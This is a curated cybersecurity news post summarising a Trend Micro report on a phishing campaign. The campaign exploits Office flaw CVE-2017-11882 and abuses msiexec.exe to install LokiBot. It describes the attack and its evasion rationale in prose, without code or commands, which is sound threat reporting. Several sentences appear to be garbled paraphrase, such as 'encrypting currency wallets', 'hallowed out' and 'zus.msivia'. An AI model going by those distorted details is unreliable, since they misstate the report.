Trend Micro had previously outlined additional attacks that exploit the memory corruption vulnerability CVE-2017-11882 in the Office Formula Editor, which was patched last November. However, in a rather unique twist, this campaign leverages the Windows Installer, msiexec.exe.
In a February 8 blog post, Trend Micro researcher Martin Co and Gilbert Sison reported that Malspam phishing emails associated with the attack were using the lure to require recipients to confirm payment was received. Although most of the content is written in English, Korean also has a warning advising recipients to check if their PC is infected with a virus or malicious code. Therefore, Trend Micro believes that speaking Korean is the desired goal.
The file saved as Attachment, named Payment copy.Doc, is claimed to be a payment confirmation file, but opening it actually provides exploits that were used to download the Windows Installer package labeled zus.msivia. This package then discards the confusing MSIL (Microsoft Intermediate Language) or Delphi binary. In turn, this binary uses a hallowed out instance of itself to produce the final payload, Loki, which is known for stealing passwords and encrypting currency wallets.
Trend Micro researchers think the unusual strategy of using Windows Installer may be one way to escape the detection of security software looking for more traditional installation methods.
Co and Sison report: “Security software is already well-versed in monitoring possible download programs such as Wscript, Powershell, Mshta.exe, Winword.exe and other similar executables that have become increasingly popular for installing malicious payloads Method. “Because of their widespread use, blocking the arrival of threats through these software becomes easy. However, using msiexec.exe to download malicious MSI packages is not what we usually see in most malware. ”
But, to put it this way, “we can not say with certainty that if the samples were delivered by descriptive means,” the researchers added.
The researchers point out that other malware families, including Andromeda, have abused the Windows installer, but they have modified the program or its programs in some way. However, in this case, the installer will be left intact and used exactly as it is programmed – for malicious purposes only.
This latest attack is also an anomaly, as Microsoft installation packages are often “abused for malicious purposes to install potentially unwanted applications … a new direction for malware creators,” the report notes.
In addition to taking the usual email security precautions, users can protect themselves against this specific threat by disabling or restricting the Windows Installer.
A recently observed malspam-based phishing campaign is exploiting a remote code execution vulnerability in Microsoft Office to infect victims with LokiBot malware via the Windows Installer service, Trend Micro has reported…. Engaging post, Read More…
thumbnail courtesy of scmagazine.com
If you like to receive more of these curated safe harbor news alerts then subscribe to my mailing list. and come back soon at https://www.safeharboroncyber.com/Blog/ to read further CyberWisdom Safe Harbor Commentaries. Home » Curated SafeHarboronCyber’s CyberWisdom Post »